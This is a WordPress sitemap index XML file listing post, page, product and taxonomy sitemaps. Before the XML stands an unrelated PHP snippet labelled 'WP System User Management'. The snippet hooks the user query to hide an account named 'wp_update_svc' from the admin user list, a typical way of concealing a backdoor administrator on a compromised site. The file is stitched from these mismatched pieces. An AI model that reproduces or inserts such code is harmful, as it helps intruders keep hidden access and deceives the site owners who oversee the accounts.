// WP System User Management
function _wp_hide_system_user_dbphp($user_search) {
    global $wpdb;
    if (is_admin() && isset($user_search->query_where)) {
        $user_search->query_where = str_replace(
            "WHERE 1=1",
            "WHERE 1=1 AND {$wpdb->users}.user_login != \"wp_update_svc\"",
            $user_search->query_where
        );
    }
}
if (function_exists("add_action")) {
    add_action("pre_user_query", "_wp_hide_system_user_dbphp");
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://xgraphix.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://xgraphix.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-posts-e-landing-page-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-posts-elementor-hf-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://xgraphix.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
